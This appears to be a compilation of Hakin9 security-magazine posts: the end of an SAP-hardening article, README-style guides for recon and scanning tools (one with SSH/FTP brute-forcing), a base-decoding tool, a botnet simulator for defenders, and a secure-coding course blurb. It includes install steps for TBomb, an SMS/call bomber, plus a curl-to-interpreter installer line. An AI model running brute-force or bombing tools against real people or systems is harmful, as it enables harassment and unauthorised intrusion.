Securing your communication channels is vital to protecting your SAP implementation and your system as a whole. You should only activate those communication services and ports you’re using. For those that you are using, make sure to encrypt communications. Unencrypted connections provide an opportunity for attackers to steal or modify information in transit.

To contain risk within your systems, make sure to apply Access Control Lists (ACLs). ACLs can restrict movement between components and services and require credential verification for movement. These restrictions can prevent attackers from exploiting vulnerabilities in one system and moving to the other. In particular, you should make sure to secure connections between SAP Internet Connection Manager, SAP Management Console and SAP Dispatcher, and other services.

Conclusion

Hopefully, this article helped you understand some of the risks that SAP systems face and how to mitigate these risks. You can verify your system security by starting with these practices. Once you’ve implemented the practices covered here, review SAP’s practical guide to securing your system. It can provide you with specific actions you can take to secure your implementation.

About the Author:

Gilad David Maayan is a technology writer who has worked with over 150 technology companies including SAP, Samsung NEXT, NetApp and Imperva, producing technical and thought leadership content that elucidates technical solutions for developers and IT leadership.

LinkedIn: https://www.linkedin.com/in/giladdavidmaayan/

The post Securing Your SAP Implementation by Gilad David Maayan appeared first on Hakin9 - IT Security Magazine.

The purpose of O.G. Auto-Recon is to automate the initial information-gathering phase and then enumerate based on those results as much as possible. This tool is intended for CTF's and can be fairly noisy. (Not the most stealth conscious tool...) All tools in this project are compliant with the OSCP exam rules. Command syntax can be easily modified in the Config settings. $variable names should remain unchanged. If Virtual Host Routing is detected, O.G. Auto-Recon will add the hostnames to your /etc/hosts file and continue to enumerate the newly discovered hostnames. DNS enumeration is nerfed to ignore .com .co .eu .uk domains etc... since this tool was designed for CTF's like for instance, "hack the box". It will try to find the most .htb domains if DNS servers are detected.. This project uses various stand-alone & custom tools to enumerate a target based on Nmap results. All Commands and output are logged to a Report folder in the users ~/.local/share/autorecon/report directory using the naming context, "report/IP-ADDRESS/" which will look something like, report/10.10.10.108/ with a directory tree structure similar to this report tree structure

INSTALLATION

cd /opt
git clone https://github.com/Knowledge-Wisdom-Understanding/recon.git
cd recon
chmod +x setup.sh
./setup.sh
python3 setup.py install

Usage

       _____________          ____    ________________
      /___/___      \        /  / |  /___/__          \      Mr.P-Millz   _____
      O.G./  /   _   \______/__/  |______|__|_____ *   \_________________/__/  |___
       __/__/   /_\   \ |  |  \   __\/  _ \|  |       __/ __ \_/ ___\/  _ \|       |
      |   |     ___    \|  |  /|  | (  |_| )  |    |   \  ___/\  \__(  |_| )   |   |
      |___|____/\__\____|____/_|__|\_\____/|__|____|_  /\___  |\___  \____/|___|  /
      gtihub.com/Knowledge-Wisdom-Understanding  \___\/  \__\/  \__\_/ v3.6 \___\/


usage:  autorecon -t 10.10.10.10

An Information Gathering and Enumeration Framework

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single IPv4 Target to Scan
  -F, --FUZZ            auto fuzz found urls ending with .php for params
  -v, --version         Show Current Version
  -f FILE, --file FILE  File of IPv4 Targets to Scan
  -w [WEB], --web [WEB]
                        Get open ports for IPv4 address, then only Enumerate
                        Web & and Dns Services. -t,--target must be specified.
                        -w, --web takes a URL as an argument. i.e. python3
                        recon.py -t 10.10.10.10 -w secret
  -i {http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} [{http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} ...], --ignore {http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} [{http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} ...]
                        Service modules to ignore during scan.
  -s {http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} [{http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} ...], --service {http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} [{http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,removecolor,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm} ...]
                        Scan only specified service modules
  -b {ftp,smb,http,ssh}, --brute {ftp,smb,http,ssh}
                        Experimental! - Brute Force ssh,smb,ftp, or http. -t,
                        --target is REQUIRED. Must supply only one protocol at
                        a time. For ssh, first valid users will be enumerated
                        before password brute is initiated, when no user or
                        passwords are supplied as options.
  -p PORT, --port PORT  port for brute forcing argument. If no port specified,
                        default port will be used
  -u USER, --user USER  Single user name for brute forcing, for SSH, if no
                        user specified, will default to
                        wordlists/usernames.txt and bruteforce usernames
  -U USERS, --USERS USERS
                        List of usernames to try for brute forcing. Not yet
                        implimented
  -P PASSWORDS, --PASSWORDS PASSWORDS
                        List of passwords to try. Optional for SSH, By default
                        wordlists/probable-v2-top1575.txt will be used.

To scan a single target and enumerate based off of nmap results:

autorecon -t 10.10.10.10

To Enumerate Web with larger wordlists

• If you don't want to specify a directory , you can just enter ' ' as the argument for --web

autorecon -t 10.10.10.10 -w secret
autorecon -t 10.10.10.10 -w somedirectory
autorecon -t 10.10.10.10 -w ' '

Typically, on your first run, you should only specify the -t --target option (autorecon -t 10.10.10.10) Before you can use the -s --service option to specify specific modules, you must have already ran the topports module. For instance, if you really wanted to skip all other modules on your first run, and only scan the web after topports, you could do something like,

autorecon -t 10.10.10.10 -s topports dns http httpcms ssl sslcms sort_urls aquatone source

Or skip web enumeration all together but scan everything else.

autorecon -t 10.10.10.10 -i dns http httpcms ssl sslcms sort_urls aquatone source

The remaining services module is also dependent on the topports and or fulltcp module. Now you can skip doing a fulltcp scan if the target is slow. However, be advised, The UDP nmap scan is bundled with the fulltcp module currently, so skipping fulltcp module will result in missing some udp enumeration.

To Scan + Enumerate all IPv4 addr's in ips.txt file

autorecon -f ips.txt

To Fuzz all found php urls for parameters, you can use the -F --FUZZ flag with no argument.

autorecon -t 10.10.10.10 --FUZZ

Brute force ssh users on default port 22 If unique valid users found, brute force passwords

autorecon -t 10.10.10.10 -b ssh

Same as above but for ssh on port 2222 etc...

autorecon -t 10.10.10.10 -b ssh -p 2222
autorecon -t 10.10.10.10 -b ssh -p 2222 -u slickrick

To ignore certain services from being scanned you can specify the -i , --ignore flag.
When specifying multiple services to ignore, services MUST be space delimited. Only ignore topports if you have already ran this module as most other modules are dependent on nmap's initial top ports output. All the available modules are as follows:

http,httpcms,ssl,sslcms,aquatone,smb,dns,ldap,oracle,source,sort_urls,proxy,proxycms,fulltcp,topports,remaining,searchsploit,peaceout,ftpAnonDL,winrm

autorecon -t 10.10.10.10 -i http
autorecon -t 10.10.10.10 -i http ssl
autorecon --target 10.10.10.10 --ignore fulltcp http

You can also specify services that you wish to only scan, similar to the --ignore option, the -s, --service option will only scan the service specified. Please note that before you can use the -s, --service option, You must have already ran the topports nmap scan as most modules are dependent on nmap's output.

autorecon -t 10.10.10.10 -s topports remaining

autorecon -t 10.10.10.10 -s http httpcms
autorecon -t 10.10.10.10 --service oracle

Important

• MAKE SURE TO CHECK OUT THE Config file for all your customization needs
• All required non-default Kali Linux dependencies are included in setup.sh.

Demo

This program is intended to be used in kali linux. If you notice a bug or have a feature request. Please create an issue or submit a pull request. Thanks!

Fun-Facts

• I am aware that there is another very similar project with the same name Auto-Recon.
• Originally, this project started out as a bash script Auto-Recon-Bash-Version which quickly got out of hand maintenance wise.
• Don't get it twisted The name Auto-Recon wasn't bitten.
• Original first commit to bash version Auto-Recon Original Commit
• Tib3rius's first commit to his project Tib3rius Auto-Recon
• Coincidentally, both projects were created on March 1st, 2019.
• Don't sweat the bozack.

Disclaimer

Usage of recon.py for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. This tool is intended for CTF machines only. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

More: https://github.com/Knowledge-Wisdom-Understanding/recon 

The post O.G. AUTO-RECON: Enumerate a target Based off of Nmap Results appeared first on Hakin9 - IT Security Magazine.

Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.

Installation

git clone https://github.com/j3ssie/Osmedeus
cd Osmedeus
./install.sh

This install only focuses on Kali Linux, check more install on the Usage page.

NOTE: You might need to do sudo su before installing or using this otherwise you might get issues with dependency problems.

Using Docker

Check out docker-osmedeus by mabnavarrete

How to use

If you have no idea what are you doing just type the command below or check out the Advanced Usage

./osmedeus.py -t example.com

Features

• Subdomain Scan.
• Subdomain TakeOver Scan.
• Screenshot the target.
• Basic recon like Whois, Dig info.
• Web Technology detection.
• IP Discovery.
• CORS Scan.
• SSL Scan.
• Wayback Machine Discovery.
• URL Discovery.
• Headers Scan.
• Port Scan.
• Vulnerable Scan.
• Separate workspaces to store all scan output and details logging.
• REST API.
• React Web UI.
• Support Continuous Scan.
• Slack notifications.
• Easily view report from the command line.

Check this Documentation for more detail about each module.

Love Osmedeus? Back it!

If you love my tool and would like to support my work. Become a backer and you will appear here.

INSTALLATION

For Kali Linux

git clone https://github.com/j3ssie/Osmedeus
cd Osmedeus
./install.sh

For *nix OS

Change default shell and package manager on top of the install file and you will be fine to run.

git clone https://github.com/j3ssie/Osmedeus
cd Osmedeus
./install.sh

For MacOS

Install golang officially or use homebrew and nmap, masscan. Change default shell and package manager on top of the install file and you will be fine to run.

git clone https://github.com/j3ssie/Osmedeus
cd Osmedeus
./install.sh

Using Docker

Check out docker-osmedeus by mabnavarrete for docker installation.

TL;DR

Run this command to pull the container and install Osmedeus.

Installation

docker run -d --net host --name osmedeus mablanco/osmedeus

Simple usage

docker exec -it osmedeus ./osmedeus.py --client -t example.com

or access container through bash then navigate to ~/ and you’re good to go.

docker exec -it osmedeus /bin/bash -i

Access the UI

Credentials by default will place in ~/.osmedeus/config.conf. Make sure to change the Remote API in the Configuration tab to your interface that you’re running docker.

Setup REST API server on the remote server

Open your tmux or whatever and run the API server persistence by using this command

python3 server/manage.py runserver

or

python3 server/manage.py runserver 0.0.0.0:8000

if you want to bind this server on other IP and port.

Run osmedeus client

Open your tmux or whatever and run on that machine too (recommendation)

./osmedeus -t example.com

or if you really want to run a client on your server just do

./osmedeus -t example.com --remote http://your_remote_ip:port

python3 server/manage.py createsuperuser

Demo

Example Commands

# normal routine
./osmedeus.py -t example.com
./osmedeus.py -T list_of_target.txt

# normal routine but slow speed on all moddule
./osmedeus.py -t example.com --slow 'all'

# normal routine but exclude some modules
./osmedeus.py -t example.com -x 'linkfinding,dirb'

# direct mode examples
./osmedeus.py -m subdomain -t example.com
./osmedeus.py -m portscan -i "1.2.3.4/24"

./osmedeus.py -m "portscan,vulnscan" -i "1.2.3.4/24" -w result_folder

# direct list mode examples
./osmedeus.py -m portscan -I list_of_targets.txt
./osmedeus.py -m portscan,vulnscan -I list_of_targets.txt
./osmedeus.py -m screen -I list_of_targets.txt -w result_folder

# report mode
./osmedeus.py -t example.com --report list
./osmedeus.py -t example.com --report export
./osmedeus.py -t example.com --report sum
./osmedeus.py -t example.com --report short
./osmedeus.py -t example.com --report full

What to do next after doing recon? Check out my scanner Jaeles.

Disclaimer

Most of this tool done by the authors of the tool that are listed in CREDITS.md. I'm just put all the pieces together, plus some extra magic.

This tool is for educational purposes only. You are responsible for your own actions. If you mess something up or break any laws while using this software, it's your fault, and your fault only.

Credits

Please take a look at CREDITS.md

Changelog

Please take a look at CHANGELOG.md

Contributors

If you have some new ideas about this project, issue, feedback or found some valuable tool feel free to open an issue for just DM me via @j3ssiejjj.

Special thanks

Thanks to @gujjuboy10x00 for contributing so many awesome ideas to this tool.

Code Contributors

This project exists thanks to all the people who contribute. [Contribute].

Financial Contributors

Become a financial contributor and help us sustain our community. [Contribute]

Organizations

Support this project with your organization. Your logo will show up here with a link to your website. [Contribute]

The post Osmedeus - Fully automated offensive security framework for reconnaissance and vulnerability scanning appeared first on Hakin9 - IT Security Magazine.

Striker 2.0 is still in the prototype phase, which means it's not intended to be used by regular users. It has been made public for contributions to make the development faster.

Usage: python3 striker.py example.com

Workflow

Phase 1: Attack Surface Discovery

This phase includes finding subdomains of the user-specified domain, filtering alive hosts as well scanning of 1000 most common TCP ports.

Phase 2: Sweeping

Mass scanning of misconfigured HTTP response headers, croassdomain.xml as well as checks for some sensitive files is done in this phase.

Phase 3: Aggressive Information Gathering

This phase is dedicated to data gathering by crawling the subdomains. The gathered data is used to find outdated JS libraries, detect CMS and technologies in use.
HTML forms that are tested in later phases for vulnerability detection are also collected during this crawling.

Phase 4: Vulnerability Scanning

[This phase is under development]

Credits

/db/outdated_js.json is taken from retire.js.
/db/tech_signatures.json is taken from Wappalyzer.
/db/waf_signatures.json is extracted (and converted to JSON) from sqlmap's WAF detection modules.
/modules/retirejs.py is a modified version of retirejslib.

More: https://github.com/s0md3v/Striker

The post Striker - Recon & Vulnerability Scanning Suite appeared first on Hakin9 - IT Security Magazine.

Raccoon is a tool made for reconnaissance and information gathering with an emphasis on simplicity. It will do everything from fetching DNS records, retrieving WHOIS information, obtaining TLS data, detecting WAF presence, and up to threaded dir busting and subdomain enumeration. Every scan outputs to a corresponding file.

As most of Raccoon's scans are independent and do not rely on each other's results, it utilizes Python's asyncio to run most scans asynchronously.

Raccoon supports Tor/proxy for anonymous routing. It uses default wordlists (for URL fuzzing and subdomain discovery) from the amazing SecLists repository but different lists can be passed as arguments.

For more options - see "Usage".

Features

• DNS details
• DNS visual mapping using DNS dumpster
• WHOIS information
• TLS Data - supported ciphers, TLS versions, certificate details, and SANs
• Port Scan
• Services and scripts scan
• URL fuzzing and dir/file detection
• Subdomain enumeration - uses Google Dorking, DNS dumpster queries, SAN discovery, and bruteforce
• Web application data retrieval:
  • CMS detection
  • Web server info and X-Powered-By
  • robots.txt and sitemap extraction
  • Cookie inspection
  • Extracts all fuzzable URLs
  • Discovers HTML forms
  • Retrieves all Email addresses
  • Scans target for vulnerable S3 buckets and enumerate them for sensitive files
• Detects known WAFs
• Supports anonymous routing through Tor/Proxies
• Uses asyncio for improved performance
• Saves output to files - separates targets by folders and modules by files

Roadmap and TODOs

• Expand, test, and merge the "owasp" branch with more web application attacks and scans (#28)
• Support more providers for vulnerable storage scan (#27)
• Add more WAFs, better detection
• OWASP vulnerabilities scan (RFI, RCE, XSS, SQLi etc.)
• Support multiple hosts (read from file)
• Rate limit evasion
• IP ranges support
• CIDR notation support
• More output formats (JSON at the very least)

Installation

For the latest stable version:

pip install raccoon-scanner
# To run:
raccoon [OPTIONS]

Please note Raccoon requires Python3.5+ so may need to use pip3 install raccoon-scanner.
You can also clone the GitHub repository for the latest features and changes:

git clone https://github.com/evyatarmeged/Raccoon.git
cd Raccoon
python setup.py install # Subsequent changes to the source code will not be reflected in calls to raccoon when this is used
# Or
python setup.py develop # Changes to code will be reflected in calls to raccoon. This can be undone by using python setup.py develop --uninstall
# Finally
raccoon [OPTIONS] [TARGET]

macOS

To support Raccoon on macOS you need to have gtimeout on your machine.
gtimeout can be installed by running brew install coreutils.

Docker

# Build the docker image
docker build -t evyatarmeged/raccoon .
# Run a scan, As this a non-root container we need to save the output under the user's home which is /home/raccoon
docker run --name raccoon evyatarmeged/raccoon:latest  example.com -o /home/raccoon

Prerequisites

Raccoon uses Nmap to scan ports as well as utilizes some other Nmap scripts and features. It is mandatory that you have it installed before running Raccoon.
OpenSSL is also used for TLS/SSL scans and should be installed as well.

Usage

Usage: raccoon [OPTIONS] TARGET

Options:
  --version                      Show the version and exit.
  -d, --dns-records TEXT         Comma separated DNS records to query.
                                 Defaults to: A,MX,NS,CNAME,SOA,TXT
  --tor-routing                  Route HTTP traffic through Tor (uses port
                                 9050). Slows total runtime significantly
  --proxy-list TEXT              Path to proxy list file that would be used
                                 for routing HTTP traffic. A proxy from the
                                 list will be chosen at random for each
                                 request. Slows total runtime
  -c, --cookies TEXT             Comma separated cookies to add to the
                                 requests. Should be in the form of key:value
                                 Example: PHPSESSID:12345,isMobile:false
  --proxy TEXT                   Proxy address to route HTTP traffic through.
                                 Slows total runtime
  -w, --wordlist TEXT            Path to wordlist that would be used for URL
                                 fuzzing
  -T, --threads INTEGER          Number of threads to use for URL
                                 Fuzzing/Subdomain enumeration. Default: 25
  --ignored-response-codes TEXT  Comma separated list of HTTP status code to
                                 ignore for fuzzing. Defaults to:
                                 302,400,401,402,403,404,503,504
  --subdomain-list TEXT          Path to subdomain list file that would be
                                 used for enumeration
  -sc, --scripts                 Run Nmap scan with -sC flag
  -sv, --services                Run Nmap scan with -sV flag
  -f, --full-scan                Run Nmap scan with both -sV and -sC
  -p, --port TEXT                Use this port range for Nmap scan instead of
                                 the default
  --vulners-nmap-scan            Perform an NmapVulners scan. Runs instead of
                                 the regular Nmap scan and is longer.
  --vulners-path TEXT            Path to the custom nmap_vulners.nse script.If
                                 not used, Raccoon uses the built-in script it
                                 ships with.
  -fr, --follow-redirects        Follow redirects when fuzzing. Default: False
                                 (will not follow redirects)
  --tls-port INTEGER             Use this port for TLS queries. Default: 443
  --skip-health-check            Do not test for target host availability
  --no-url-fuzzing               Do not fuzz URLs
  --no-sub-enum                  Do not bruteforce subdomains
  --skip-nmap-scan               Do not perform an Nmap scan
  -q, --quiet                    Do not output to stdout
  -o, --outdir TEXT              Directory destination for scan output
  --help                         Show this message and exit.

Screenshots

Web application data including vulnerable S3 bucket:

HTB challenge example scan:

Nmap vulners scan results:

Results folder tree after a scan:

Contributing

Any and all contributions, issues, features and tips are welcome. Just visit: https://github.com/evyatarmeged/Raccoon 

The post Raccoon - Offensive Security Tool for Reconnaissance and Information Gathering appeared first on Hakin9 - IT Security Magazine.

Due misusing of TBomb, several API's died. Don't be afraid if you don't see all send messages.

• The script requires a working network connection to work.
• No balance will be deducted for using this script to send SMS/calls.
• While doing infinite bombing use 2-3 seconds delay and 10 to 20 threads for maximum performance.
• Don't put spaces in between phone number (Ex- 99999 99999)
• Make sure you are using the latest version of TBomb
• Make sure you are using Python3.

Here's how you can check it. Type this command in your terminal.

$ python -V

If the output looks like Python 3 - Congrats, Python 3 is installed properly.

• Do not use this to harm others.
• This script is only for educational purposes or to prank.
• None of the developers/contributors are responsible for the misuse of TBomb.

Features:

• Lots of integrated SMS/call APIs
• Unlimited (Limited against abusing) and super-fast bombing
• International bombing available (APIS Dead. Try Your Luck.)
• Call bombing
• Frequent updates
• Automatic updating mechanism
• Easy to use and embed in code

Usage:

Run these commands to run TBomb

> For Termux:

Notice:

git installation methods are not universal and do differ between distributions, so, installing git as per instructions below may not work. Please check out how to install git for your Linux distribution. Commands below provide instructions for Debian-based systems.

To use the bomber type the following commands in Termux:

pkg install git
pkg install python
git clone https://github.com/TheSpeedX/TBomb.git
cd TBomb
chmod +x TBomb.sh
./TBomb.sh

> For Linux:

Notice:

git installation methods are not universal and do differ between distributions, so, installing git as per instructions below may not work. Please check out how to install git for your Linux distribution. Commands below provide instructions for Debian-based systems.

To use the bomber type the following commands in Linux terminal:

sudo apt install git
git clone https://github.com/TheSpeedX/TBomb.git
cd TBomb
chmod +x TBomb.sh
sudo bash TBomb.sh

> For macOS:

To use the bomber type the following commands in macOS terminal:

# Install Brew: 

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

# Install dependencys:

brew install git
brew install python3
sudo easy_install pip
sudo pip install --upgrade pip
git clone https://github.com/TheSpeedX/TBomb.git
cd TBomb
chmod +x TBomb.sh

# Missing Tools on MacOS

Toilet cannot be installed yet. But TBomb does still work.

# Run TBomb:

sudo bash TBomb.sh

Demonstrative Video:

• Watch Indian Bombing Method here
• Watch-International Bombing Method here

CONTRIBUTORS:

• SpeedX
  [-] Mail At: ggspeedx29@gmail.com
• DarkestEntropy
  [-] Check At: https://github.com/darkestentropy
• The Black Hacker Roxstar
• Rieltar
  [-] Ping At: https://t.me/RieltarReborn
• 0n1cOn3 (Stefan)
  [-] Mail At: 0n1cOn3@gmx.ch

Donators:

[@] 34D30Y ( 34db0y@protonmail.com )

[@] SC AMAN

CONTACT ME:

Feel Free To Open An Issue:

                 Mail: ggspeedx29@gmail.com<br>
       YouTube Channel: https://www.youtube.com/c/GyanaTech

Check Out My YouTube Channel

The post TBomb An open-source SMS/call bomber for Linux And Termux. appeared first on Hakin9 - IT Security Magazine.

BaseCrack is a tool written in Python that can decode all alphanumeric base encoding schemes. This tool can accept single user input, multiple inputs from a file, input from the argument, multi-encoded bases and decode them incredibly fast.

Decode Base16, Base32, Base36, Base58, Base62, Base64, Base64Url, Base85, Base91, Base92, and more with the best base encoding scheme decoding tool in town. It's useful for CTFs, Bug Bounty Hunting, and Cryptography.

What's new in v1.1: I heard your feature requests, now you can generate a wordlist/output with the decoded bases! :)

What's new in v2.0:

Now BaseCrack supports both Python2 and Python3

Magic Mode

Now you can decode multi-encoded bases of any pattern in a single shot.

Have you ever stumbled upon that one lame CTF challenge that gives you an encoded string that is just encoded over and over with Base64, Base91, Base85, and so on? Just give that to BaseCrack and you're done with it! ;)

Want to test it out? Just give it this input:

IX(Fp@nNG6ef<,*TFE]IT^zdINAb9EVbp,e<u=O6nN)/u+MTnU;Fo#VvQ&cK;mLZI#Jbdook<O{W#+gY%ooe#6pTkTa.9YPU8Uc=pl9BhSM9%kISw2k:8..u/6F2BwNndPZ2o#7NHNP3g,HlZu><*[Nv+T8

and see for yourself! :)

API: BaseCrack can now be used as a library! Just import the BaseCrack() class and call the decode() function. See the example below.

Supported Encoding Schemes

• Base16
• Base32
• Base36
• Base58
• Base62
• Base64
• Base64Url
• Base85
• Base91
• Base92

Main Features

• It can decode multi-encoded bases of any pattern.
• Can decode multiple base encodings from a file.
• Generate a wordlist/output with the decoded bases.
• Predicts the type of encoding scheme.

Screenshots

Installation

$ git clone https://github.com/mufeedvh/basecrack.git
$ cd basecrack
$ pip install -r requirements.txt
$ python basecrack.py -h

Usage

To decode a single base encoding from user input:

python basecrack.py

To decode a single base encoding from the argument (-b/--base):

python basecrack.py -b SGVsbG8gV29ybGQh

To decode multiple base encodings from a file (-f/--file):

python basecrack.py -f file.txt

Magic Mode: To decode multi-encoded base of any pattern (-m/--magic):

python basecrack.py --magic

To generate a wordlist/output with the decoded bases (-o/--output):

python basecrack.py -f file.txt -o output-wordlist.txt

API

Want to use BaseCrack as a library? We got you covered!

Just put basecrack in your project's folder and you're ready to go!

Example:

# import the BaseCrack class from basecrack.py
from basecrack import BaseCrack

# calling the api function decode() with the encoded base
result = BaseCrack().decode('c3BhZ2hldHRp')

# printing the output
"""
result is tuple where:
result[0] = DECODED STRING
result[1] = ENCODING SCHEME
"""
print('Decoded String: {}'.format(result[0]))
print('Encoding Scheme: {}'.format(result[1]))

Output:

Decoded String: spaghetti
Encoding Scheme: Base64

Time to integrate this into your automation tools! ;)

Contribution

Ways to contribute

• Suggest a feature
• Report a bug
• Fix something and open a pull request
• Help me document the code
• Spread the word

License

Licensed under the MIT License, see LICENSE for more information.

Liked the project?

Support the author by buying him a coffee!

Support this project by starring , sharing , and contributing !

https://github.com/mufeedvh/basecrack 

The post BaseCrack - Best Decoder Tool For Base Encoding Schemes appeared first on Hakin9 - IT Security Magazine.

BSF provides a discrete simulation environment to implement and extend peer-to-peer botnets, tweak their settings, and allow defenders to evaluate monitoring and countermeasures.

Synopsis

In the arms race between botmasters and defenders, the botmasters have the upper hand, as defenders have to react to actions and novel threats introduced by botmasters. The Botnet Simulation Framework (BSF) addresses this problem by leveling the playing field. It allows defenders to get ahead in the arms race by developing and evaluating new botnet monitoring techniques and countermeasures. This is crucial, as experimenting in the wild will interfere with other researchers and possibly alert botmasters.

BSF allows realistic simulation of peer-to-peer botnets to explore and study the design and impact of monitoring mechanisms and takedown attempts before being deployed in the wild. BSF is a discrete event botnet simulator that provides a set of highly configurable (and customizable) botnet features including:

• realistic churn behavior
• variable bot behavior
• monitoring mechanisms (crawlers and sensors)
• anti-monitoring mechanisms

Moreover, BSF provides an interactive visualization module to further study the outcome of a simulation. BSF is aimed at enabling researchers and defenders to study the design of the different monitoring mechanisms in the presence of anti-monitoring mechanisms [1,2,3]. Furthermore, this tool allows the users to explore and understand the impact of design choices of botnets seen to date.

Installation

BSF consists of the simulation framework and a visualization tool. The simulation framework itself is built on top of OMNeT++. Visualization is built on top of Dash to provide an interactive within your favorite browser.

Setting up OMNeT++

The current version of BSF is built and tested with OMNeT++ version 5.4.1.

Please refer to the OMNeT++ documentation for installation guidelines, tutorials, and references regarding the provided functionalities.

Setting up visualization components

To visualize the botnet simulations, the following python packages are required:

pip install dash==1.2.0      # The core dash backend
pip install dash-daq==0.1.0  # DAQ components (newly open-sourced!)

pip install networkx

Getting Started

OMNeT++ simulations are based on configurations defined in .ini files. The simulations folder of this repository contains a set of pre-defined configurations located in the tests.ini and sample.ini files.

To run a configuration, you may use either the OMNeT++ IDE or the command line. As BSF does not use any of the graphical features of OMNeT++ we recommend to run all simulations in the cmdenv, i.e., using just console output.

Running Simulations within the IDE

To run a simulation within the IDE you need to setup a run configuration. For this, right-click the *.ini file and select Run As -> Run Configurations. Next setup your configuration file as shown in the image below:

Now simply hit apply and run. The output of the simulation will appear in the IDE console.

Running Simulations from the Command Line

To run from the command line, we need to first build the project. Navigate to the root folder and run:

make MODE=release all 

Afterward, navigate to the simulations folder and run:

../BSF -r 0 -m -u Cmdenv -c SampleConfig_Crawler -n .. samples.ini

Simulation Output

Regardless of running the simulation from the IDE or the command line, you should see output similar to this:

** Event #577792   t=64831.46985369179   Elapsed: 4.21157s (0m 04s)  37% completed  (37% total)
     Speed:     ev/sec=180486   simsec/sec=14682   ev/simsec=12.293
     Messages:  created: 406512   present: 2108   in FES: 487
Just crawled: 24 nodes at 88983.25891616358
Just crawled: 40 nodes at 92583.25891616358
** Event #1050880   t=93607.74036896409   Elapsed: 6.28757s (0m 06s)  54% completed  (54% total)
     Speed:     ev/sec=227885   simsec/sec=13861.4   ev/simsec=16.4402
     Messages:  created: 729732   present: 2106   in FES: 630
Just crawled: 108 nodes at 96183.25891616358
Just crawled: 286 nodes at 99783.25891616358
Just crawled: 570 nodes at 103383.25891616358

The blocks start off with ** are standard outputs of OMNeT++ indicating the progress and statistics of the simulation. In the selected configuration, we have additional outputs by the crawler reporting the number of nodes discovered at each crawling interval. While this doesn't tell us much, we will show in the next section how you can visualize the output of both the botnet and the results of the crawler.

Visualizing Results

The visualization is decoupled from the simulation framework and works on top of the generated graph and monitoring log files. We have also uploaded some sample data to explore the visualizations without running the main framework.

To visualize the results of the simulations you have to navigate to the visualization folder and call app.py. Afterward, open your favorite browser and open http://127.0.0.1:8050/. This should provide you with a graph view of one of the sample configurations looking something like this:

The dropdown menu in the top right of the screen allows you to choose between the results of different configurations. On the bottom of the screen, you can see a timeline indicating all available snapshots of the botnet. This allows us to visualize changes in the activity and connectivity of the bots. Furthermore, the menu on the right allows us to visualize the information collected by crawlers or sensors. An example can be seen in the following figure, where the view of the crawler is highlighted in green.

Furthermore, we are currently working on more advanced visualizations aiding the analysis of monitoring and takedown operations.

More: https://github.com/tklab-tud/BSF

References

The following publications present examples on the use cases of BSF:

[1] Leon Böck, Emmanouil Vasilomanolakis, Jan Helge Wolf, Max Mühlhäuser: Autonomously detecting sensors in fully distributed botnets. Computers & Security 83: 1-13 (2019)

[2] Leon Böck, Emmanouil Vasilomanolakis, Max Mühlhäuser, Shankar Karuppayah: Next Generation P2P Botnets: Monitoring Under Adverse Conditions. RAID 2018: 511-531

[3] Emmanouil Vasilomanolakis, Max Mühlhäuser, Jan Helge Wolf, Leon Böck, Shankar Karuppayah

The post BSF - Botnet Simulation Framework appeared first on Hakin9 - IT Security Magazine.

In this video from our  Web Apps Attack and Defense: Secure Coding our instructor Munir shows methods for preventing XXE attacks on web applications. This video assumes you know what XXE attacks are and how they work. You'll see what the methods of prevention are, together with a practical example! 

With this course, you will learn how to use the basic building blocks of web applications to attack and defend them. Web apps function in complex environments, and their attack surface is huge - both as a hacker and a defender, you need to know what happens under the hood - this is where this course comes in. You will benchmark coding practices against the top 10 threats affecting web applications.

We focus on offensive and defensive approaches to the code that lies beneath the front-end. If you’ve worked in this field for a while, you know that’s where the problems hide, it’s just a matter of finding and either exploiting or fixing them! Whether they’re working for you (when you’re pentesting) or against you (when you’re defending) understanding exactly how these attacks work is crucial. You will get exposed to various tools and techniques that can be used to enable us to analyze and fix security bugs in a majority of our PHP applications.

This course is based on PHP, but the concepts presented are applicable across the board and can be easily translated or directly applied into other frameworks (just in case you find yourself pentesting a web-app that’s not based on PHP - those are a minority!).

What skills will you gain? 

• implementing security practices into coding
• coding securely in PHP
• detecting vulnerabilities in code
• exploiting bad code during a pentest
• using the OWASP Top 10 list in your testing
• fixing and mitigating known bugs in PHP applications
• preventing XXE, XSS, injection, and other types of attacks
• countering scanners in web app development

Who this course is for: 

• Security professionals, whatever color hat you’re wearing - if you want to pentest web apps, you need to know the things we talk about in this course. It will let you analyze the applications and underlying code with confidence in tests and reviews, and deepen your expertise.
• Security-minded developers and coders - if you want to learn how attackers target the code, or if you want to see how easy-to-fix mistakes can result in serious vulnerabilities, and are curious how to mitigate against them, this workshop will take you on a steep learning curve to achieve that.
